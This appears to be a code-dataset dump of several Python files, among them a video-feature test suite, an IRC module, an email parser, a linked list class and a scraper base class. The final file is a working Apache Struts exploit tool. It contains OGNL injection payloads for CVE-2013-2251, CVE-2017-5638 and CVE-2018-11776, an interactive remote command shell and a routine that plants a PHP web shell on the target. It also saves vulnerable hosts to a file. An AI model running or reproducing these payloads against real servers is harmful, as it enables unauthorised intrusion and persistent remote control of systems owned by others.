id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3274274 | <filename>tests/general_tests.py<gh_stars>1-10
import os
# WINNOW_CONFIG must be set before winnow is imported (it is read at import time).
os.environ['WINNOW_CONFIG'] = os.path.abspath('config.yaml')
from glob import glob
import numpy as np
from winnow.feature_extraction import IntermediateCnnExtractor,frameToVideoRepresentation,SimilarityModel
from winnow.utils import create_directory,scan_videos,get_original_fn_from_artifact,create_video_list
import yaml
import pytest
import warnings
import shutil

# Number of fixture videos the test dataset is expected to contain.
NUMBER_OF_TEST_VIDEOS = 40
# Sub-folder name for each stage of the representation pipeline, in order.
representations = ['frame_level','video_level','video_signatures']
with open("tests/config.yaml", 'r') as ymlfile:
    cfg = yaml.safe_load(ymlfile)
# Load main config variables from the TEST config file
DATASET_DIR = cfg['video_source_folder']
DST_DIR = cfg['destination_folder']
VIDEO_LIST_TXT = cfg['video_list_filename']
ROOT_FOLDER_INTERMEDIATE_REPRESENTATION =cfg['root_folder_intermediate']
USE_DB = cfg['use_db']
CONNINFO = cfg['conninfo']
KEEP_FILES = cfg['keep_fileoutput']
# NOTE(review): dead assignment — FRAME_LEVEL_SAVE_FOLDER is overwritten by the
# os.path.join version a few lines below.
FRAME_LEVEL_SAVE_FOLDER = os.path.abspath(DST_DIR + '{}/{}'.format(ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0]))
# NOTE(review): dead assignment — overwritten below with 'video_signatures.npy'.
VIDEO_SIGNATURES_FILENAME = 'video_signatures'
FRAME_LEVEL_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0])
VIDEO_LEVEL_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[1])
VIDEO_SIGNATURES_SAVE_FOLDER = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[2])
# NOTE(review): this value already carries the .npy extension, but it is later
# formatted into '{}.npy', yielding 'video_signatures.npy.npy' — confirm intent.
VIDEO_SIGNATURES_FILENAME = 'video_signatures.npy'
HANDLE_DARK = str(cfg['filter_dark_videos'])
DETECT_SCENES = str(cfg['detect_scenes'])
MIN_VIDEO_DURATION = cfg['min_video_duration_seconds']
DISTANCE = float(cfg['match_distance'])
# NOTE(review): duplicate assignment — KEEP_FILES was already set above.
KEEP_FILES = cfg['keep_fileoutput']
# Ensure we do not have processed files from previous test runs.
# ignore_errors=True covers the common case of the directory not existing yet
# (first run) without the original bare ``except:`` that silently hid every
# other failure (permissions, partial deletes, ...) as well.
shutil.rmtree('tests/test_data/test_output/representations/', ignore_errors=True)
def test_config_input():
    """Sanity-check the types of the values loaded from the TEST config file."""
    assert isinstance(DATASET_DIR, str), 'video_source_folder takes a string as a parameter'
    assert isinstance(DST_DIR, str), 'destination_folder takes a string as a parameter'
    assert isinstance(ROOT_FOLDER_INTERMEDIATE_REPRESENTATION, str), 'root_folder_intermediate takes a string as a parameter'
    assert isinstance(USE_DB, bool), 'use_db takes a boolean as a parameter'
    # Fixed copy-pasted message: this assertion checks conninfo, not use_db.
    assert isinstance(CONNINFO, str), 'conninfo takes a string as a parameter'
# additional tests for the inner string structure
# Ensures that config specifications are translated into the right file structure
# Ensure that config specifications are translated into the right file structure.
create_directory(representations,DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION)
frame_level_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[0])
video_level_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[1])
video_signatures_folder = os.path.join(DST_DIR,ROOT_FOLDER_INTERMEDIATE_REPRESENTATION,representations[2])
# Discover the fixture videos and any features left over from earlier runs.
videos = scan_videos(DATASET_DIR,'**')
processed_videos = scan_videos(FRAME_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_filenames = get_original_fn_from_artifact(processed_videos,'_vgg_features')
full_video_names = [os.path.basename(x) for x in videos]
# Indices of videos whose features have not been extracted yet.
remaining_videos = [i for i,x in enumerate(full_video_names) if x not in processed_filenames]
remaining_videos_path = np.array(videos)[remaining_videos]
# Write the list of videos still to process; returns the list file's path.
VIDEOS_LIST = create_video_list(remaining_videos_path,VIDEO_LIST_TXT)
video_files_count = len(open(VIDEOS_LIST).readlines())
# Stage 1: per-frame VGG feature extraction.
extractor = IntermediateCnnExtractor(VIDEOS_LIST,FRAME_LEVEL_SAVE_FOLDER)
extractor.start(batch_size=16, cores=4)
processed_videos_after_extraction = scan_videos(FRAME_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_videos_features = np.array([np.load(x) for x in processed_videos_after_extraction if 'vgg_features' in x])
# Stage 2: aggregate frame-level features into one video-level vector each.
converter = frameToVideoRepresentation(FRAME_LEVEL_SAVE_FOLDER,VIDEO_LEVEL_SAVE_FOLDER)
converter.start()
processed_videos_vl = scan_videos(VIDEO_LEVEL_SAVE_FOLDER,'**_vgg_features.npy')
processed_videos_features_vl = np.array([np.load(x) for x in processed_videos_vl if 'vgg_features' in x])
# Stage 3: compute compact similarity signatures (NaNs zeroed for stability).
sm = SimilarityModel()
video_signatures = sm.predict(VIDEO_LEVEL_SAVE_FOLDER)
video_signatures = np.nan_to_num(video_signatures)
# NOTE(review): VIDEO_SIGNATURES_FILENAME already ends in '.npy', so this
# produces 'video_signatures.npy.npy' — confirm the intended file name.
SIGNATURES_FILEPATH = os.path.join(VIDEO_SIGNATURES_SAVE_FOLDER,'{}.npy'.format(VIDEO_SIGNATURES_FILENAME))
SIGNATURES_INDEX_FILEPATH = os.path.join(VIDEO_SIGNATURES_SAVE_FOLDER,'{}-filenames.npy'.format(VIDEO_SIGNATURES_FILENAME))
np.save(SIGNATURES_FILEPATH,video_signatures)
np.save(SIGNATURES_INDEX_FILEPATH,sm.original_filenames)
def test_directory_structure():
    """All three representation folders must exist after create_directory()."""
    for folder in (frame_level_folder, video_level_folder, video_signatures_folder):
        assert os.path.exists(folder)
def test_videos_can_be_scanned():
    # All fixture videos are discovered, and nothing has been processed yet.
    assert len(videos) == NUMBER_OF_TEST_VIDEOS
    assert len(processed_videos) == 0
def test_video_filenames_can_be_extracted():
    # Every scanned video yields a basename, and all still need processing.
    assert len(full_video_names) == NUMBER_OF_TEST_VIDEOS
    assert len(remaining_videos) == NUMBER_OF_TEST_VIDEOS
def test_video_list_creation():
    # The generated list file contains one line per remaining video.
    assert video_files_count == NUMBER_OF_TEST_VIDEOS
def test_intermediate_cnn_extractor():
    """Every video must produce a frame-level feature array that is 4096-wide."""
    valid_shape_count = sum(1 for features in processed_videos_features if features.shape[1] == 4096)
    assert len(processed_videos_after_extraction) == NUMBER_OF_TEST_VIDEOS
    assert valid_shape_count == NUMBER_OF_TEST_VIDEOS
def test_frame_to_video_converter():
    # One 1x4096 video-level vector per fixture video.
    assert processed_videos_features_vl.shape == (NUMBER_OF_TEST_VIDEOS,1, 4096)
def test_signatures_shape():
    # The similarity model emits a 500-dimensional signature per video.
    assert video_signatures.shape == (NUMBER_OF_TEST_VIDEOS,500)
def test_signatures_fp():
    # Signatures round-trip through the saved .npy file with the same shape.
    vs = np.load(SIGNATURES_FILEPATH)
    assert vs.shape == (NUMBER_OF_TEST_VIDEOS, 500)
| StarcoderdataPython |
175431 | <filename>txircd/modules/rfc/response_error.py
from twisted.plugin import IPlugin
from txircd.module_interface import IModuleData, ModuleData
from zope.interface import implements
class ErrorResponse(ModuleData):
    """Sends the RFC-mandated ERROR message to a client when it quits."""
    # Python 2 / zope.interface style declaration (this module predates
    # @implementer decorators).
    implements(IPlugin, IModuleData)

    name = "ErrorResponse"
    core = True

    def actions(self):
        # Hook sendError onto the "quit" action with priority 10.
        return [ ("quit", 10, self.sendError) ]

    def sendError(self, user, reason):
        # NOTE(review): assumes user.host is callable here — confirm against
        # the txircd user object, where host is sometimes a plain attribute.
        user.sendMessage("ERROR", "Closing Link: {}@{} [{}]".format(user.ident, user.host(), reason), to=None, prefix=None)

# Module instance picked up by the twisted plugin system.
errorResponse = ErrorResponse()
4838485 | <filename>hotmail_eml_to_txt_converter/parser/HotmailEMLChainParser.py
import quopri as qp
from bs4 import BeautifulSoup
from hotmail_eml_to_txt_converter.parser.Email import Email
from datetime import datetime
class HotmailEMLChainParser():
    # Parses .eml files downloaded from Hotmail into individual email objects.
    # Constructor takes a file object such as that returned by open()
    # Usage:
    # parsed_chain = HotmailEMLChainParser(file_object)
    #
    # For emails in chain:
    # parsed_chain.get_emails()
    # For correspondents in chain:
    # parsed_chain.get_correspondents()
    def __init__(self, file_buffer):
        """Decode the quoted-printable .eml buffer and parse the whole chain."""
        self._emails = []           # Email objects, oldest headers first
        self._correspondents = {}   # email address -> display name
        if file_buffer is None:
            return
        # Hotmail .eml bodies are quoted-printable encoded UTF-8.
        decoded = qp.decodestring(file_buffer.read())
        decoded_utf = decoded.decode("utf-8")
        # Everything before the <html> tag is the header "preamble".
        html_start_idx = decoded_utf.find("<html>")
        self._preamble = decoded_utf[:html_start_idx]
        # NOTE(review): the replaced literal below appears to target a
        # non-breaking space (U+00A0 / &nbsp;) — the character may have been
        # mangled in transit; verify against the original file.
        self._html = decoded_utf[html_start_idx:].replace(" ", "")
        self._body_text = BeautifulSoup(self._html, "html.parser").get_text()
        self._current_position = 0  # scan cursor into _body_text
        self._parseChain()
    def get_emails(self):
        """Return the list of parsed Email objects."""
        return self._emails
    def get_correspondents(self):
        """Return the mapping of email address -> display name seen in the chain."""
        return self._correspondents
    def _parseChain(self):
        # parses email chain and populates self.emails list
        # parse initial email (its head lives in the preamble, its body in the
        # html text up to the first quoted "From:" marker)
        next_email_index = self._find_next_email_index()
        builder = self.EmailBuilder(self._preamble, self._body_text[:next_email_index], is_first_in_chain=True)
        first_email = builder.build()
        # The first email names both correspondents; later quoted emails only
        # carry bare addresses, so names are filled in from this mapping.
        self._correspondents[first_email.sender_email] = first_email.sender_name
        self._correspondents[first_email.receiver_email] = first_email.receiver_name
        self._emails.append(first_email)
        # parse remaining (quoted) emails, each introduced by a "From:" line
        while next_email_index != -1:
            self._current_position = next_email_index
            head_start = next_email_index
            end_of_head = self._find_end_of_head()
            self._current_position = end_of_head
            next_email_index = self._find_next_email_index()
            # Body runs from the end of this head to the next "From:" marker
            # (slicing with -1 drops the final character of the last body —
            # NOTE(review): confirm that is intended).
            builder = self.EmailBuilder(self._body_text[head_start:end_of_head], self._body_text[end_of_head:next_email_index])
            email = builder.build()
            email.sender_name = self._correspondents.get(email.sender_email, "")
            email.receiver_name = self._correspondents.get(email.receiver_email, "")
            self._emails.append(email)
    def _find_end_of_head(self):
        # "Date:" is the last header line of a quoted email; the head ends
        # just after its trailing newline.
        date_index = self._body_text.find("Date:", self._current_position)
        end_of_head_index = self._body_text.find("\n", date_index) + 1
        return end_of_head_index
    def _find_next_email_index(self):
        # Index of the next quoted email's "From:" marker, or -1 if none left.
        return self._body_text.find("From:", self._current_position)
    class EmailBuilder():
        # Takes email head and body as strings, along with bool
        # for whether it is the first email in chain and therefore
        # the preamble must be taken into account
        #
        # Preamble should be in format:
        #
        # MIME-Version: 1.0
        # Date: Sat, 1 Jan 2011 18:11:50 -0400
        # From: Foo <<EMAIL>>
        # Subject: RE:
        # Thread-Topic: RE:
        # To: Bar <<EMAIL>>
        # Content-Transfer-Encoding: quoted-printable
        # Content-Type: text/html; charset="utf-8"
        #
        # Subsequent emails should be in format:
        #
        # From: <EMAIL>
        # To: <EMAIL>
        # Subject:
        # Date: Sat, 1 Jan 2011 14:50:14 +0000
        def __init__(self, head, body, is_first_in_chain=False):
            self._is_first_in_chain = is_first_in_chain
            self._head = head
            self._body = body
            self._email = Email()
            # Header fields we extract; all others are ignored.
            self._required_fields = ["To:", "From:", "Subject:", "Date:"]
        def build(self):
            # Builds email and returns Email object
            if self._head:
                self._parse_email()
            return self._email
        def _parse_email(self):
            """Walk the head line-by-line, filling the Email's fields."""
            head_items = self._head.split("\n")
            for item in head_items:
                if item == "":
                    continue
                field_end = item.find(":") + 1
                field = item[:field_end]
                if field in self._required_fields:
                    value = item[field_end:]
                    # NOTE(review): in the preamble, "To:" is mapped to the
                    # *sender* and "From:" to the *receiver* — i.e. fields are
                    # interpreted from the downloader's perspective; confirm
                    # this inversion is intentional.
                    if field == "To:":
                        if self._is_first_in_chain:
                            name, email_address = self._parse_preamble_email(value)
                            self._email.sender_name = name
                            self._email.sender_email = email_address
                        else:
                            self._email.sender_email = value.strip()
                    elif field == "From:":
                        if self._is_first_in_chain:
                            name, email_address = self._parse_preamble_email(value)
                            self._email.receiver_name = name
                            self._email.receiver_email = email_address
                        else:
                            self._email.receiver_email = value.strip()
                    elif field == "Subject:":
                        self._email.subject = value.strip()
                    elif field == "Date:":
                        self._email.datetime_hotmail_format = value.strip()
                        dt = self._create_datetime_from_hotmail_format(self._email.datetime_hotmail_format)
                        self._email.date = dt.strftime("%Y-%m-%d")
                        self._email.time = dt.strftime("%H-%M-%S")
            self._email.body = self._body.strip()
        def _parse_preamble_email(self, email_field_value):
            # Split 'Name <address>' into its two parts.
            email_address_start = email_field_value.index("<")
            name = email_field_value[:email_address_start].strip()
            email_address = email_field_value[email_address_start:].strip("<>")
            return (name, email_address)
        def _create_datetime_from_hotmail_format(self, hotmail_format_string):
            # Because %-d doesn't work in windows, these shenanigans must be done:
            # zero-pad the day-of-month so that %d can parse it portably.
            datetime_elements = hotmail_format_string.split(" ")
            day_of_month = int(datetime_elements[1])
            if day_of_month < 10:
                datetime_elements[1] = "0" + datetime_elements[1]
            datetime_string = " ".join(datetime_elements)
            # End of shenanigans
            dt = datetime.strptime(datetime_string, "%a, %d %b %Y %H:%M:%S %z")
            return dt
| StarcoderdataPython |
183587 | <reponame>ShaswatPrabhat/LinkedList
from LinkedList import LinkedListNodes
class SinglyLinkedList:
    """A singly linked list built from a plain Python list.

    Nodes are ``LinkedListNodes.SinglyLinkedNode`` instances exposing ``val``,
    ``getNext()`` and ``setNext()``.  Mutators return True/False for success
    and print a short message on empty-list misuse (preserved behaviour).
    """

    def __init__(self, sourceList: list):
        """Build the list preserving the order of *sourceList*.

        Bug fix: the original linked the very first node to itself
        (head.setNext(head)), which left a one-element list cyclic.
        """
        lastInitializedNode: LinkedListNodes.SinglyLinkedNode or None = None
        self.headOfList: LinkedListNodes.SinglyLinkedNode or None = None
        self.length = len(sourceList)
        for value in sourceList:
            node = LinkedListNodes.SinglyLinkedNode(val=value)
            if self.headOfList is None:
                self.headOfList = node
            else:
                lastInitializedNode.setNext(node)
            lastInitializedNode = node

    def __len__(self) -> int:
        return self.length

    def isEmptyList(self) -> bool:
        return self.headOfList is None

    def traverseList(self) -> None:
        """Print every value in order; refuses to traverse a cyclic list."""
        print("Traversing linked list")
        if not self.isEmptyList():
            if self.hasCycle():
                print("LinkedList contains a cycle, traversal will be infinite LOL!")
            else:
                node = self.headOfList
                while node.getNext() is not None:
                    print(node.val)
                    node = node.getNext()
                print(node.val)
        else:
            print("EMPTY LIST!!")

    def findValue(self, value) -> LinkedListNodes.SinglyLinkedNode or None:
        """Return the first node holding *value*, or None if absent.

        Bug fix: the original walked past the tail and raised AttributeError
        when the value was not present.
        """
        if not self.isEmptyList():
            node = self.headOfList
            while node is not None and node.val != value:
                node = node.getNext()
            return node
        else:
            print("Empty List")

    def deleteFirstNode(self) -> bool:
        """Remove the head node; return True on success."""
        if not self.isEmptyList():
            self.headOfList = self.headOfList.getNext()
            self.length -= 1
            return True
        else:
            print("Empty list")
            return False

    def deleteLastNode(self) -> bool:
        """Remove the tail node; return True on success."""
        if self.isEmptyList():
            print("Empty list")
            return False
        elif self.length == 1:
            self.headOfList = None
            self.length -= 1
            return True
        else:
            # Stop at the penultimate node and cut off the tail.
            node = self.headOfList
            while node.getNext().getNext() is not None:
                node = node.getNext()
            node.setNext(None)
            self.length -= 1
            return True

    def deleteValue(self, value) -> bool:
        """Delete the first node holding *value*; return True on success.

        Bug fixes: the original compared with identity (``is not``), which is
        only reliable for interned objects such as small ints, and its
        multi-node branch never examined the head node at all.
        """
        if self.isEmptyList():
            print("Empty list")
            return False
        elif self.length == 1:
            if self.headOfList.val == value:
                self.headOfList = None
                self.length -= 1
                return True
            else:
                return False
        else:
            if self.headOfList.val == value:
                self.headOfList = self.headOfList.getNext()
                self.length -= 1
                return True
            node = self.headOfList
            while node.getNext() is not None and node.getNext().val != value:
                node = node.getNext()
            if node.getNext() is None:
                return False
            node.setNext(node.getNext().getNext())
            self.length -= 1
            return True

    def insertAfterValue(self, value, valueToBeInserted) -> bool:
        """Insert *valueToBeInserted* right after the first node holding *value*."""
        if self.isEmptyList():
            print("Empty list")
            return False
        else:
            node = self.headOfList
            while node is not None:
                if node.val == value:
                    newNode = LinkedListNodes.SinglyLinkedNode(val=valueToBeInserted)
                    newNode.setNext(node.getNext())
                    node.setNext(newNode)
                    self.length += 1
                    return True
                node = node.getNext()
            return False

    def insertValueInBeginning(self, value):
        """Prepend *value* as the new head."""
        newNode = LinkedListNodes.SinglyLinkedNode(value)
        if self.isEmptyList():
            self.headOfList = newNode
        else:
            newNode.setNext(self.headOfList)
            self.headOfList = newNode
        self.length += 1

    def __getitem__(self, item):
        """0-based indexing; prints a message and returns None on bad input.

        Bug fix: the original accepted ``item == length`` (and negatives),
        walking past the tail and crashing.
        """
        if type(item) is not int:
            print("Please enter subscriptable index integers only")
            return None
        if self.isEmptyList():
            print("Empty list")
            return None
        if item < 0 or item >= self.length:
            print("Index too large, list too small")
            return None
        node = self.headOfList
        for _ in range(item):
            node = node.getNext()
        return node.val

    def hasCycle(self) -> bool:
        """Floyd's tortoise-and-hare cycle detection.

        Bug fix: the original compared node *values* (false positives on
        duplicate values) and dereferenced ``fast.val`` when fast was None,
        crashing on one-node lists.  Nodes are now compared by identity.
        """
        if self.isEmptyList():
            return False
        slow = self.headOfList
        fast = self.headOfList
        while fast is not None and fast.getNext() is not None:
            slow = slow.getNext()
            fast = fast.getNext().getNext()
            if slow is fast:
                return True
        return False
| StarcoderdataPython |
1718741 | import logging
from time import sleep, time
from bs4 import BeautifulSoup
from xml.etree import ElementTree
import requests
USER_AGENT = ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '
'AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 '
'Safari/605.1.15')
class Site(object):
    """Anime site

    Base class for a rating-site scraper.  Subclasses override the class
    constants below and implement ``info_url``, ``_get_rating`` and
    ``_search``.
    """
    BASE_URL = None
    NAMES = None
    # Bounds of the site's native rating scale; used by unify_rating().
    MIN_RATING = None
    MAX_RATING = None
    DYNAMIC_ID = False
    # Minimum seconds between successive requests (simple rate limit).
    MIN_ACTION_INTERVAL = 0
    # Locales tried, in order, when searching by name.
    SEARCH_LOCALES = ['ja-jp']

    def __init__(self):
        # One shared HTTP session with a browser-like User-Agent.
        self.session = requests.Session()
        self.session.headers['User-Agent'] = USER_AGENT
        self._last_action_epoch = 0  # epoch seconds of the last throttled call

    def _get(self, url, **kws):
        return self.session.get(url, **kws)

    def _post(self, url, **kws):
        return self.session.post(url, **kws)

    def _get_soup(self, url, parser='html5lib', **kws):
        # GET and parse the response body as HTML.
        return BeautifulSoup(self._get(url, **kws).text, parser)

    def _post_soup(self, url, parser='html5lib', **kws):
        return BeautifulSoup(self._post(url, **kws).text, parser)

    def _get_json(self, url, **kws):
        return self._get(url, **kws).json()

    def _post_json(self, url, json, **kws):
        return self._post(url, json=json, **kws).json()

    def _get_xml(self, url, **kws):
        return ElementTree.fromstring(self._get(url, **kws).content)

    def _sleep_if_needed(self):
        # Block until MIN_ACTION_INTERVAL has elapsed since the last call.
        delay = self._last_action_epoch + self.MIN_ACTION_INTERVAL - time()
        if delay > 0:
            sleep(delay)
        self._last_action_epoch = time()

    def unify_rating(self, rating):
        """Map a site-native rating onto a common 0-100 scale."""
        return ((rating - self.MIN_RATING) /
                (self.MAX_RATING - self.MIN_RATING) * 100)

    def get_rating(self, id):
        """Return (rating, vote_count) for *id*, or (None, None) on any failure.

        The broad except is a deliberate best-effort: scraping failures are
        reported as "no rating" rather than propagated.
        """
        try:
            self._sleep_if_needed()
            return self._get_rating(id)
        except Exception:
            return None, None

    def search(self, names):
        """Try each configured locale's name in turn; return the first hit or None.

        *names* maps locale codes (e.g. 'ja-jp') to title strings.
        """
        for locale in self.SEARCH_LOCALES:
            if locale in names:
                self._sleep_if_needed()
                try:
                    return self._search(names[locale])
                except Exception:
                    pass  # No worries, just try next locale.
        return None

    def info_url(self, id):
        # Subclass hook: URL of the title's info page.
        raise NotImplementedError

    def _get_rating(self, id):
        # Subclass hook: raw (rating, count) lookup.
        raise NotImplementedError

    def _search(self, name):
        # Subclass hook: site-specific name search returning an id.
        raise NotImplementedError
def main(site, names):
    """Debug driver: search *site* for *names*, then print URL and ratings."""
    logging.basicConfig(level=logging.DEBUG)
    found_id = site.search(names)
    if found_id is None:
        return
    print(site.info_url(found_id))
    rating, count = site.get_rating(found_id)
    unified_rating = site.unify_rating(rating) if rating is not None else None
    print(f'{rating} ({count}), {unified_rating}')
| StarcoderdataPython |
3225520 | <filename>exploit/webapp/apache/Apache_Struts_2_CVE-2013-2251.py
#!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
from builtins import str
import urllib.request, urllib.error, urllib.parse
import time
import sys
import os
import subprocess
import requests
import readline
import urllib.parse
# ANSI escape sequences for coloured terminal output.
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'   # cyan ("other")
YELLOW = '\033[33m'
ENDC = '\033[0m'    # reset attributes
def cls():
    """Clear the terminal on both Windows ('cls') and POSIX ('clear')."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
cls()
# Target URL is taken from the command line: script.py http(s)://host/path
host = sys.argv[1]
if len(host) > 0:
    if host.find("https://") != -1 or host.find("http://") != -1:
        # OGNL probe for CVE-2013-2251: a vulnerable server echoes "mamalo".
        poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
        def exploit(comando):
            # CVE-2013-2251 payload: *comando* is a comma-separated, quoted
            # argv list (e.g. "'ls','-l'") fed to java.lang.ProcessBuilder.
            exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
            return exploit
        def exploit2(comando):
            # CVE-2017-5638 payload: OGNL injection via the Content-Type header;
            # *comando* is a single shell command string.
            exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
            return exploit2
        def exploit3(comando):
            # CVE-2018-11776 payload: OGNL injection in the URL namespace;
            # *comando* is a space-escaped (%20) command line.
            exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
            return exploit3
        def pwnd(shellfile):
            # Same transport as exploit(): used to drop a web shell on disk.
            exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
            return exploitfile
        def validador():
            # Benign probe commands (Linux and Windows) whose output patterns
            # are matched below to confirm code execution.
            arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
            return arr_lin_win
        #def reversepl(ip,port):
        #    print "perl"
        #def reversepy(ip,port):
        #    print "python"
        # CVE-2013-2251 ---------------------------------------------------------------------------------
        try:
            response = ''
            response = urllib.request.urlopen(host+poc)
        except:
            # NOTE(review): bare except hides the real failure cause.
            print(RED+" Servidor no responde\n"+ENDC)
            exit(0)
        print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
        # NOTE(review): response.read() returns *bytes* in Python 3, so
        # .find("mamalo") with a str needle raises TypeError — should be
        # b"mamalo" or the body should be decoded first.
        if response.read().find("mamalo") != -1:
            print(RED+" [-] VULNERABLE"+ENDC)
            owned = open('vulnsite.txt', 'a')
            owned.write(str(host)+'\n')
            owned.close()
            opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
            #print BOLD+" * [SHELL REVERSA]"+ENDC
            #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
            if opcion == 's':
                print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
                time.sleep(1)
                print(BOLD+" * [UPLOAD SHELL]"+ENDC)
                print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
                # Interactive pseudo-shell: loops forever reading commands.
                while 1:
                    separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
                    espacio = separador.split(' ')
                    comando = "','".join(espacio)
                    if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
                        shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
                        print("\n"+shell.read())
                    elif espacio[0] == 'pwnd':
                        pathsave=input("path EJ:/tmp/: ")
                        if espacio[1] == 'php':
                            # Drop a minimal PHP web shell via python -c.
                            shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
                            urllib.request.urlopen(host+pwnd(str(shellfile)))
                            shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
                            # NOTE(review): bytes-vs-str .find issue here too.
                            if shell.read().find(pathsave+"status.php") != -1:
                                print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
                            else:
                                print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
        # CVE-2017-5638 ---------------------------------------------------------------------------------
        print(BLUE+" [-] NO VULNERABLE"+ENDC)
        print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
        x = 0
        # Try each probe command until one produces recognisable output.
        while x < len(validador()):
            valida = validador()[x]
            try:
                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
                result = urllib.request.urlopen(req).read()
                # NOTE(review): result is bytes in Python 3 (see above).
                if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
                    print(RED+" [-] VULNERABLE"+ENDC)
                    owned = open('vulnsite.txt', 'a')
                    owned.write(str(host)+'\n')
                    owned.close()
                    opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
                    if opcion == 's':
                        print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
                        time.sleep(1)
                        while 1:
                            try:
                                separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
                                req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
                                result = urllib.request.urlopen(req).read()
                                print("\n"+result)
                            except:
                                exit(0)
                    else:
                        # Skip the remaining probes.
                        x = len(validador())
                else:
                    print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
            except:
                # NOTE(review): bare except silently drops network errors.
                pass
            x=x+1
        # CVE-2018-11776 ---------------------------------------------------------------------------------
